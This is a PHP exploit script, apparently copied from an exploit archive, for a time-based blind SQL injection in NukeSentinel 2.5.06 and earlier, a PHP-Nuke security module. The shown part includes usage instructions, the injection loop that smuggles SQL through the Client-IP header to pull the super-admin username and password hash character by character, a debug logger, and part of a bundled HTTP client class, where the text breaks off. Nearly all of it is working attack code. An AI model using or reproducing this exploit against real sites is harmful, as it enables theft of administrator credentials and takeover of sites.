NukeSentinel <= 2.5.06 (mysql >= 4.0.24) Remote SQL Injection Exploit

#!/usr/bin/php <?php error_reporting(E_ALL&nbsp;^&nbsp;E_NOTICE); if($argc&nbsp;<&nbsp;3) { print(\" --&nbsp;&nbsp;NukeSentinel&nbsp;<=&nbsp;2.5.06&nbsp;SQL&nbsp;Injection&nbsp;(mysql&nbsp;>=&nbsp;4.0.24)&nbsp;Exploit&nbsp;&nbsp;--- ----------------------------------------------------------------------- PHP&nbsp;conditions:&nbsp;none CMS&nbsp;conditions:&nbsp;disable_switch<=0&nbsp;(module&nbsp;activated),&nbsp;track_active=1 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Credits:&nbsp;DarkFig&nbsp;<gmdarkfig@gmail.com> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;URL:&nbsp;http://www.acid-root.new.fr/ ----------------------------------------------------------------------- &nbsp;&nbsp;Usage:&nbsp;$argv[0]&nbsp;-url&nbsp;<>&nbsp;[Options] &nbsp;Params:&nbsp;-url&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;For&nbsp;example&nbsp;http://victim.com/phpnuke/&nbsp; Options:&nbsp;-prefix&nbsp;&nbsp;&nbsp;&nbsp;Table&nbsp;prefix&nbsp;(default=nuke) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-debug&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Debug&nbsp;mod&nbsp;activated&nbsp;(debug_ns.html) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-truetime&nbsp;&nbsp;Server&nbsp;response&nbsp;time&nbsp;which&nbsp;returns&nbsp;true &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-benchmark&nbsp;You&nbsp;can&nbsp;change&nbsp;the&nbsp;value&nbsp;used&nbsp;in&nbsp;benchmark() &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-proxy&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;If&nbsp;you&nbsp;wanna&nbsp;use&nbsp;a&nbsp;proxy&nbsp;<proxyhost:proxyport>&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-proxyauth&nbsp;Basic&nbsp;authentification&nbsp;<proxyuser:proxypwd> Example:&nbsp;$argv[0]&nbsp;-url&nbsp;http://localhost/phpnuke/&nbsp;-debug &nbsp;&nbsp;&nbsp;Note:&nbsp;This&nbsp;exploit&nbsp;is&nbsp;based&nbsp;on&nbsp;the&nbsp;server&nbsp;response&nbsp;time &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;If&nbsp;you&nbsp;have&nbsp;some&nbsp;problems&nbsp;use&nbsp;-debug,&nbsp;-benchmark,&nbsp;-truetime ----------------------------------------------------------------------- \");exit(1); } $url&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;getparam(\"url\",1); $tblprfix&nbsp;&nbsp;=&nbsp;(getparam(\"prefix\")!=\"\")&nbsp;&nbsp;&nbsp;&nbsp;?&nbsp;getparam(\"prefix\")&nbsp;:&nbsp;\'nuke\'; $debug&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;(getparam(\"debug\")!=\"\")&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;?&nbsp;1&nbsp;:&nbsp;0; $benchmark&nbsp;=&nbsp;(getparam(\"benchmark\")!=\"\")&nbsp;?&nbsp;getparam(\"benchmark\")&nbsp;:&nbsp;\'100000000\'; $proxy&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&nbsp;getparam(\"proxy\"); $proxyauth&nbsp;=&nbsp;getparam(\"proxyauth\"); $xpl&nbsp;=&nbsp;new&nbsp;phpsploit(); $xpl->agent(\'Mozilla&nbsp;Firefox\'); $xpl->allowredirection(0); $xpl->cookiejar(0); if($proxy)&nbsp;$xpl->proxy($proxy); if($proxyauth)&nbsp;$xpl->proxyauth($proxyauth); if($debug)&nbsp;debug(1); print&nbsp;\" Username:&nbsp;\";bruteforce(\'aid\'); print&nbsp;\" Password:&nbsp;\";bruteforce(\'pwd\'); exit(0); function&nbsp;bruteforce($field) { global&nbsp;$url,$xpl,$tblprfix,$truetime,$debug,$benchmark,$sql,$bef,$aft,$fak,$b,$c,$f,$dfield,$a,$result;&nbsp; $a=0;$v=\'\';$dfield=$field; if(eregi(\'a\',$field))&nbsp;{&nbsp;$b=\'-1\';$c=\'127\';}&nbsp;#&nbsp;aid&nbsp;charset else&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;$b=\'46\';$c=\'70\';&nbsp;}&nbsp;#&nbsp;pwd&nbsp;charset while(TRUE) { $a++; for($e=$b;$e<=$c;$e++) { $fak&nbsp;=&nbsp;rand(128,254).\'.\' &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;.rand(128,254).\'.\' &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;.rand(128,254).\'.\' &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;.rand(128,254); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if($e==$b)&nbsp;$f=\"TST\"; elseif($e==($b+1))&nbsp;$f=\"NULL\"; else&nbsp;$f=$e; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;$db->sql_query(\"INSERT&nbsp;INTO&nbsp;`\".$prefix.\"_nsnst_tracked_ips`&nbsp;(`user_id`,&nbsp;`username`,&nbsp;`date`, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;`ip_addr`,&nbsp;`ip_long`,&nbsp;`page`,&nbsp;`user_agent`,&nbsp;`refered_from`,&nbsp;`x_forward_for`,&nbsp;`client_ip`,&nbsp;`remote_addr`, &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;`remote_port`,&nbsp;`request_method`,&nbsp;`c2c`)&nbsp;VALUES&nbsp;(\'\".$nsnst_const[\'ban_user_id\'].\"\',&nbsp;\'$ban_username2\', &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;\'\".$nsnst_const[\'ban_time\'].\"\',&nbsp;\'\".$nsnst_const[\'remote_ip\'].\"\',&nbsp;\'\".$nsnst_const[\'remote_long\'].\"\', &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;\'$pg\',&nbsp;\'$user_agent\',&nbsp;\'$refered_from\',&nbsp;\'\".$nsnst_const[\'forward_ip\'].\"\',&nbsp;\'\".$nsnst_const[\'client_ip\'].\"\', &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;\'\".$nsnst_const[\'remote_addr\'].\"\',&nbsp;\'\".$nsnst_const[\'remote_port\'].\"\',&nbsp;\'\".$nsnst_const[\'request_method\'].\"\', &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;\'$c2c\')\"); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;# $sql&nbsp;&nbsp;=&nbsp;\"(SELECT&nbsp;IF((SUBSTR(\"; $sql&nbsp;.=&nbsp;($f==\"TST\")&nbsp;?&nbsp;\"(SELECT&nbsp;1)\"&nbsp;:&nbsp;\"(SELECT&nbsp;$field&nbsp;FROM&nbsp;${tblprfix}_authors&nbsp;WHERE&nbsp;radminsuper=1)\"; $sql&nbsp;.=&nbsp;($f==\"TST\")&nbsp;?&nbsp;\",1\"&nbsp;:&nbsp;\",$a\"; $sql&nbsp;.=&nbsp;\",1)=CHAR(\"; $sql&nbsp;.=&nbsp;($f==\"TST\")&nbsp;?&nbsp;\"49\"&nbsp;:&nbsp;\"$f\"; $sql&nbsp;.=&nbsp;\")),BENCHMARK($benchmark,CHAR(66))\"; $sql&nbsp;.=&nbsp;\",1)),1,1,1,1,1,1,1,1,1)/*\"; $bef&nbsp;=&nbsp;time(); $xpl->reset(\"header\"); #&nbsp;2.5.06&nbsp;CHANGES&nbsp;(2007-03-02): #&nbsp;+&nbsp;Corrected&nbsp;a&nbsp;problem&nbsp;causing&nbsp;valid&nbsp;ip&nbsp;users&nbsp;to&nbsp;be&nbsp;tagged&nbsp;as&nbsp;invalid&nbsp;users &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;...The&nbsp;old&nbsp;sploit&nbsp;will&nbsp;not&nbsp;work&nbsp;for&nbsp;this&nbsp;version&nbsp;but&nbsp;it\'s&nbsp;always&nbsp;vulnerable,&nbsp;you&nbsp;missed&nbsp;something. &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;# #&nbsp;if(!ereg(\"^([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})\",&nbsp;$nsnst_const[\'remote_ip\'])) &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;{$nsnst_const[\'remote_ip\']&nbsp;=&nbsp;\"none\";&nbsp;} # $xpl->addheader(\"Client-IP\",\"$fak\',$sql\"); $xpl->get($url); $aft&nbsp;=&nbsp;time(); if($f==\"TST\")&nbsp;$truetime=($aft-$bef); if(getparam(\"truetime\")!=\"\")&nbsp;$truetime&nbsp;=&nbsp;getparam(\"truetime\"); if((($aft-$bef)&nbsp;>=&nbsp;$truetime)&nbsp;AND&nbsp;($f&nbsp;!=&nbsp;\"TST\"))&nbsp;$result=\'TRUE\'; else&nbsp;$result=\'FALSE\'; if($debug)&nbsp;debug(); if($result==\'TRUE\') { if($f&nbsp;!=&nbsp;\"NULL\") { print&nbsp;strtolower(chr($f)); $v&nbsp;.=&nbsp;chr($f); break; } else { return&nbsp;$v; } } #&nbsp;Retry&nbsp;if&nbsp;no&nbsp;char&nbsp;found if($f==$c)&nbsp;$a--; } } } function&nbsp;debug($first=\'\') { global&nbsp;$tblprfix,$truetime,$debug,$benchmark,$sql,$bef,$aft,$fak,$b,$c,$f,$dfield,$a,$result; if($first) { $handle&nbsp;=&nbsp;fopen(\"debug_ns.html\",\"w+\"); $data&nbsp;=&nbsp;\"<h1><div&nbsp;align=\'center\'>NukeSentinel&nbsp;&lt;=&nbsp;2.5.06&nbsp;SQL&nbsp;Injection&nbsp;(Debug)</div></h1> <pre><table&nbsp;width=\'0\'&nbsp;border=\'1\'&nbsp;align=\'center\'&nbsp;cellspacing=\'0\'><tr> <td&nbsp;align=\'center\'><b>REQUEST&nbsp;TIME</b></td> <td&nbsp;align=\'center\'><b>RESPONSE&nbsp;TIME</b></td> <td&nbsp;align=\'center\'><b>TRUETIME</b></td> <td&nbsp;align=\'center\'><b>BENCHMARK</b></td> <td&nbsp;align=\'center\'><b>RESULT</b></td>\"; #&nbsp;<td&nbsp;align=\'center\'><b>IP</b></td> $data&nbsp;.=&nbsp;\"<td&nbsp;align=\'center\'><b>FIELD</b></td> <td&nbsp;align=\'center\'><b>CHARSET</b></td> <td&nbsp;align=\'center\'><b>SUBSTR()</b></td> <td&nbsp;align=\'center\'><b>ORD()</b></td> <td&nbsp;align=\'center\'><b>CHAR()</b></td>\"; fwrite($handle,$data); fclose($handle); } else { $handle&nbsp;=&nbsp;fopen(\"debug_ns.html\",\"a\"); $data&nbsp;&nbsp;&nbsp;=&nbsp;\"<tr\"; $data&nbsp;&nbsp;.=&nbsp;($result==\'TRUE\')&nbsp;?&nbsp;\"&nbsp;bgcolor=\'#FFFF00\'\"&nbsp;:&nbsp;\"\"; $data&nbsp;&nbsp;.=&nbsp;\"> <td&nbsp;align=\'center\'>&nbsp;\".htmlentities($bef).\"&nbsp;</td> <td&nbsp;align=\'center\'>&nbsp;\".htmlentities($aft).\"&nbsp;</td> <td&nbsp;align=\'center\'>&nbsp;\".htmlentities($truetime).\"&nbsp;</td> <td&nbsp;align=\'center\'>&nbsp;\".htmlentities($benchmark).\"&nbsp;</td> <td&nbsp;align=\'center\'>&nbsp;\".htmlentities($result).\"&nbsp;</td>\"; #&nbsp;<td&nbsp;align=\'center\'>&nbsp;\".htmlentities($fak).\"&nbsp;</td> $data&nbsp;.=&nbsp;\"<td&nbsp;align=\'center\'>&nbsp;\".htmlentities($dfield).\"&nbsp;</td> <td&nbsp;align=\'center\'>&nbsp;\".htmlentities(\"$b-$c\").\"&nbsp;</td> <td&nbsp;align=\'center\'>&nbsp;\".htmlentities($a).\"&nbsp;</td> <td&nbsp;align=\'center\'>&nbsp;\".htmlentities($f).\"&nbsp;</td> <td&nbsp;align=\'center\'>&nbsp;\".htmlentities(chr($f)).\"&nbsp;</td></tr>\"; fwrite($handle,$data); fclose($handle); } } function&nbsp;getparam($param,$opt=\'\') { global&nbsp;$argv; foreach($argv&nbsp;as&nbsp;$value&nbsp;=>&nbsp;$key) { if($key&nbsp;==&nbsp;\'-\'.$param)&nbsp;{ &nbsp;&nbsp;&nbsp;if(!empty($argv[$value+1]))&nbsp;return&nbsp;$argv[$value+1]; &nbsp;&nbsp;&nbsp;else&nbsp;return&nbsp;1; } } if($opt)&nbsp;exit(\" -$param&nbsp;parameter&nbsp;required\"); else&nbsp;return; } /* &nbsp;*&nbsp; &nbsp;*&nbsp;Copyright&nbsp;(C)&nbsp;darkfig &nbsp;*&nbsp; &nbsp;*&nbsp;This&nbsp;program&nbsp;is&nbsp;free&nbsp;software;&nbsp;you&nbsp;can&nbsp;redistribute&nbsp;it&nbsp;and/or&nbsp; &nbsp;*&nbsp;modify&nbsp;it&nbsp;under&nbsp;the&nbsp;terms&nbsp;of&nbsp;the&nbsp;GNU&nbsp;General&nbsp;Public&nbsp;License&nbsp; &nbsp;*&nbsp;as&nbsp;published&nbsp;by&nbsp;the&nbsp;Free&nbsp;Software&nbsp;Foundation;&nbsp;either&nbsp;version&nbsp;2&nbsp; &nbsp;*&nbsp;of&nbsp;the&nbsp;License,&nbsp;or&nbsp;(at&nbsp;your&nbsp;option)&nbsp;any&nbsp;later&nbsp;version.&nbsp; &nbsp;*&nbsp; &nbsp;*&nbsp;This&nbsp;program&nbsp;is&nbsp;distributed&nbsp;in&nbsp;the&nbsp;hope&nbsp;that&nbsp;it&nbsp;will&nbsp;be&nbsp;useful,&nbsp; &nbsp;*&nbsp;but&nbsp;WITHOUT&nbsp;ANY&nbsp;WARRANTY;&nbsp;without&nbsp;even&nbsp;the&nbsp;implied&nbsp;warranty&nbsp;of&nbsp; &nbsp;*&nbsp;MERCHANTABILITY&nbsp;or&nbsp;FITNESS&nbsp;FOR&nbsp;A&nbsp;PARTICULAR&nbsp;PURPOSE.&nbsp;&nbsp;See&nbsp;the&nbsp; &nbsp;*&nbsp;GNU&nbsp;General&nbsp;Public&nbsp;License&nbsp;for&nbsp;more&nbsp;details.&nbsp; &nbsp;*&nbsp; &nbsp;*&nbsp;You&nbsp;should&nbsp;have&nbsp;received&nbsp;a&nbsp;copy&nbsp;of&nbsp;the&nbsp;GNU&nbsp;General&nbsp;Public&nbsp;License&nbsp; &nbsp;*&nbsp;along&nbsp;with&nbsp;this&nbsp;program;&nbsp;if&nbsp;not,&nbsp;write&nbsp;to&nbsp;the&nbsp;Free&nbsp;Software&nbsp; &nbsp;*&nbsp;Foundation,&nbsp;Inc.,&nbsp;59&nbsp;Temple&nbsp;Place&nbsp;-&nbsp;Suite&nbsp;330,&nbsp;Boston,&nbsp;MA&nbsp;&nbsp;02111-1307,&nbsp;USA. &nbsp;*&nbsp; &nbsp;*&nbsp;TITLE:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;PhpSploit&nbsp;Class &nbsp;*&nbsp;REQUIREMENTS:&nbsp;&nbsp;&nbsp;PHP&nbsp;5&nbsp;(remove&nbsp;\"private\",&nbsp;\"public\"&nbsp;if&nbsp;you&nbsp;have&nbsp;PHP&nbsp;4) &nbsp;*&nbsp;VERSION:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1.2 &nbsp;*&nbsp;LICENSE:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;GNU&nbsp;General&nbsp;Public&nbsp;License &nbsp;*&nbsp;ORIGINAL&nbsp;URL:&nbsp;&nbsp;&nbsp;http://www.acid-root.new.fr/tools/03061230.txt &nbsp;*&nbsp;FILENAME:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;phpsploitclass.php &nbsp;* &nbsp;*&nbsp;CONTACT:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;gmdarkfig@gmail.com&nbsp;(french&nbsp;/&nbsp;english) &nbsp;*&nbsp;GREETZ:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Sparah,&nbsp;Ddx39 &nbsp;* &nbsp;*&nbsp;DESCRIPTION: &nbsp;*&nbsp;The&nbsp;phpsploit&nbsp;is&nbsp;a&nbsp;class&nbsp;implementing&nbsp;a&nbsp;web&nbsp;user&nbsp;agent. &nbsp;*&nbsp;You&nbsp;can&nbsp;add&nbsp;cookies,&nbsp;headers,&nbsp;use&nbsp;a&nbsp;proxy&nbsp;server&nbsp;with&nbsp;(or&nbsp;without)&nbsp;a &nbsp;*&nbsp;basic&nbsp;authentification.&nbsp;It&nbsp;supports&nbsp;the&nbsp;GET&nbsp;and&nbsp;the&nbsp;POST&nbsp;method.&nbsp;It&nbsp;can &nbsp;*&nbsp;also&nbsp;be&nbsp;used&nbsp;like&nbsp;a&nbsp;browser&nbsp;with&nbsp;the&nbsp;cookiejar()&nbsp;function&nbsp;(which&nbsp;allow &nbsp;*&nbsp;a&nbsp;server&nbsp;to&nbsp;add&nbsp;several&nbsp;cookies&nbsp;for&nbsp;the&nbsp;next&nbsp;requests)&nbsp;and&nbsp;the &nbsp;*&nbsp;allowredirection()&nbsp;function&nbsp;(which&nbsp;allow&nbsp;the&nbsp;script&nbsp;to&nbsp;follow&nbsp;all &nbsp;*&nbsp;redirections&nbsp;sent&nbsp;by&nbsp;the&nbsp;server).&nbsp;It&nbsp;can&nbsp;return&nbsp;the&nbsp;content&nbsp;(or&nbsp;the &nbsp;*&nbsp;headers)&nbsp;of&nbsp;the&nbsp;request.&nbsp;Others&nbsp;useful&nbsp;functions&nbsp;can&nbsp;be&nbsp;used&nbsp;for&nbsp;debugging. &nbsp;*&nbsp;A&nbsp;manual&nbsp;is&nbsp;actually&nbsp;in&nbsp;development&nbsp;but&nbsp;to&nbsp;know&nbsp;how&nbsp;to&nbsp;use&nbsp;it,&nbsp;you&nbsp;can &nbsp;*&nbsp;read&nbsp;the&nbsp;comments. &nbsp;* &nbsp;*&nbsp;CHANGELOG: &nbsp;*&nbsp;[2007-01-24]&nbsp;(1.2) &nbsp;*&nbsp;&nbsp;*&nbsp;Bug&nbsp;#2&nbsp;fixed:&nbsp;Problem&nbsp;concerning&nbsp;the&nbsp;getcookie()&nbsp;function&nbsp;((|;)) &nbsp;*&nbsp;&nbsp;*&nbsp;New:&nbsp;multipart/form-data&nbsp;enctype&nbsp;is&nbsp;now&nbsp;supported&nbsp; &nbsp;* &nbsp;*&nbsp;[2006-12-31]&nbsp;(1.1) &nbsp;*&nbsp;&nbsp;*&nbsp;Bug&nbsp;#1&nbsp;fixed:&nbsp;Problem&nbsp;concerning&nbsp;the&nbsp;allowredirection()&nbsp;function&nbsp;(chr(13)&nbsp;bug) &nbsp;*&nbsp;&nbsp;*&nbsp;New:&nbsp;You&nbsp;can&nbsp;now&nbsp;call&nbsp;the&nbsp;getheader()&nbsp;/&nbsp;getcontent()&nbsp;function&nbsp;without&nbsp;parameters &nbsp;* &nbsp;*&nbsp;[2006-12-30]&nbsp;(1.0) &nbsp;*&nbsp;&nbsp;*&nbsp;First&nbsp;version &nbsp;*&nbsp; &nbsp;*/ class&nbsp;phpsploit&nbsp;{ /** &nbsp;*&nbsp;This&nbsp;function&nbsp;is&nbsp;called&nbsp;by&nbsp;the&nbsp;get()/post()&nbsp;functions. &nbsp;*&nbsp;You&nbsp;don\'t&nbsp;have&nbsp;to&nbsp;call&nbsp;it,&nbsp;this&nbsp;is&nbsp;the&nbsp;main&nbsp;function. &nbsp;* &nbsp;*&nbsp;@return&nbsp;$server_response &nbsp;*/ private&nbsp;function&nbsp;sock() { if(!empty($this->proxyhost)&nbsp;&&&nbsp;!empty($this->proxyport))&nbsp;$socket&nbsp;=&nbsp;fsockopen($this->proxyhost,$this->proxyport); else&nbsp;$socket&nbsp;=&nbsp;fsockopen($this->host,$this->port); if(!$socket)&nbsp;die(\"Error:&nbsp;The&nbsp;host&nbsp;doesn\'t&nbsp;exist\"); if($this->method===\"get\")&nbsp;$this->packet&nbsp;=&nbsp;\"GET&nbsp;\".$this->url.\"&nbsp;HTTP/1.1 \"; elseif($this->method===\"post\"&nbsp;or&nbsp;$this->method===\"formdata\")&nbsp;$this->packet&nbsp;=&nbsp;\"POST&nbsp;\".$this->url.&nbsp;\"&nbsp;HTTP/1.1 \"; else&nbsp;die(\"Error:&nbsp;Invalid&nbsp;method\"); if(!empty($this->proxyuser))&nbsp;$this->packet&nbsp;.=&nbsp;\"Proxy-Authorization:&nbsp;Basic&nbsp;\".base64_encode($this->proxyuser.\":\".$this->proxypass).\" \"; $this->packet&nbsp;.=&nbsp;\"Host:&nbsp;\".$this->host.\" \"; if(!empty($this->agent))&nbsp;&nbsp;$this->packet&nbsp;.=&nbsp;\"User-Agent:&nbsp;\".$this->agent.\" \"; if(!empty($this->header))&nbsp;$this->packet&nbsp;.=&nbsp;$this->header.\" \"; if(!empty($this->cookie))&nbsp;$this->packet&nbsp;.=&nbsp;\"Cookie:&nbsp;\".$this->cookie.\" \"; $this->packet&nbsp;.=&nbsp;\"Connection:&nbsp;Close \"; if($this->method===\"post\") { $this->packet&nbsp;.=&nbsp;\"Content-Type:&nbsp;application/x-www-form-urlencoded \"; $this->packet&nbsp;.=&nbsp;\"Content-Length:&nbsp;\".strlen($this->data).\" \"; $this->packet&nbsp;.=&nbsp;$this->data.\" \"; } elseif($this->method===\"formdata\") { $this->packet&nbsp;.=&nbsp;\"Content-Type:&nbsp;multipart/form-data;&nbsp;boundary=---------------------------\".$this->boundary.\" \"; $this->packet&nbsp;.=&nbsp;\"Content-Length:&nbsp;\".strlen($this->data).\" \"; $this->packet&nbsp;.=&nbsp;$this->data; } $this->packet&nbsp;.=&nbsp;\" \"; $this->recv&nbsp;=&nbsp;\'\'; fputs($socket,$this->packet); while(!feof($socket))&nbsp;$this->recv&nbsp;.=&nbsp;fgets($socket); fclose($socket); if($this->cookiejar)&nbsp;$this->cookiejar($this->getheader($this->recv)); if($this->allowredirection)&nbsp;return&nbsp;$this->allowredirection($this->recv); else&nbsp;return&nbsp;$this->recv; } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;allows&nbsp;you&nbsp;to&nbsp;add&nbsp;several&nbsp;cookie&nbsp;in&nbsp;the &nbsp;*&nbsp;request.&nbsp;Several&nbsp;methods&nbsp;are&nbsp;supported: &nbsp;*&nbsp; &nbsp;*&nbsp;$this->addcookie(\"name\",\"value\"); &nbsp;*&nbsp;or &nbsp;*&nbsp;$this->addcookie(\"name=newvalue\"); &nbsp;*&nbsp;or &nbsp;*&nbsp;$this->addcookie(\"othername=overvalue;&nbsp;xx=zz;&nbsp;y=u\"); &nbsp;*&nbsp; &nbsp;*&nbsp;@param&nbsp;string&nbsp;$cookiename &nbsp;*&nbsp;@param&nbsp;string&nbsp;$cookievalue &nbsp;*&nbsp; &nbsp;*/ public&nbsp;function&nbsp;addcookie($cookn,$cookv=\'\') { //&nbsp;$this->addcookie(\"name\",\"value\");&nbsp;work&nbsp;avec&nbsp;replace if(!empty($cookv)) { if($cookv&nbsp;===&nbsp;\"deleted\")&nbsp;$cookv=\'\';&nbsp;//&nbsp;cookiejar(1)&nbsp;&&&nbsp;Set-Cookie:&nbsp;name=delete if(!empty($this->cookie)) { &nbsp;&nbsp;&nbsp;&nbsp;if(preg_match(\"/$cookn=/\",$this->cookie)) &nbsp;&nbsp;&nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp; $this->cookie&nbsp;=&nbsp;preg_replace(\"/$cookn=(S*);/\",\"$cookn=$cookv;\",$this->cookie); &nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;&nbsp;else &nbsp;&nbsp;&nbsp;&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp; $this->cookie&nbsp;.=&nbsp;\"&nbsp;\".$cookn.\"=\".$cookv.\";\";&nbsp;//&nbsp;\"&nbsp;\". &nbsp;&nbsp;&nbsp;&nbsp;} } else { $this->cookie&nbsp;=&nbsp;$cookn.\"=\".$cookv.\";\"; } } //&nbsp;$this->addcookie(\"name=value;&nbsp;othername=othervalue\"); else { &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;if(!empty($this->cookie)) &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp; &nbsp; $cookn&nbsp;=&nbsp;preg_replace(\"/(.*);$/\",\"$1\",$cookn); &nbsp;&nbsp;&nbsp;&nbsp; &nbsp; $cookarr&nbsp;=&nbsp;explode(\";\",str_replace(\"&nbsp;\",&nbsp;\"\",$cookn)); &nbsp;&nbsp;&nbsp;&nbsp; &nbsp; for($i=0;$i<count($cookarr);$i++) &nbsp;&nbsp;&nbsp;&nbsp; &nbsp; { &nbsp;&nbsp;&nbsp;&nbsp; &nbsp; preg_match(\"/(S*)=(S*)/\",$cookarr[$i],$matches); &nbsp;&nbsp;&nbsp;&nbsp; &nbsp; $cookn&nbsp;=&nbsp;$matches[1]; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp; $cookv&nbsp;=&nbsp;$matches[2]; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp; $this->addcookie($cookn,$cookv); &nbsp;&nbsp;&nbsp;&nbsp; &nbsp; } &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;} &nbsp;else &nbsp;{ &nbsp; $cookn&nbsp;=&nbsp;((substr($cookn,(strlen($cookn)-1),1))===\";\")&nbsp;?&nbsp;$cookn&nbsp;:&nbsp;$cookn.\";\"; &nbsp; $this->cookie&nbsp;=&nbsp;$cookn; &nbsp;} } } /** &nbsp;*&nbsp;This&nbsp;function&nbsp;allows&nbsp;you&nbsp;to&nbsp;add&nbsp;several&nbsp;headers&nbsp;in&nbsp;the &nbsp;*&nbsp;request.&nbsp;Several&nbsp;methods&nbsp;are&nbsp;supported: &nbsp;* &nbsp;*&nbsp;$this->addheader(\"headername\",\"headervalue\"); &nbsp;*&nbsp;or 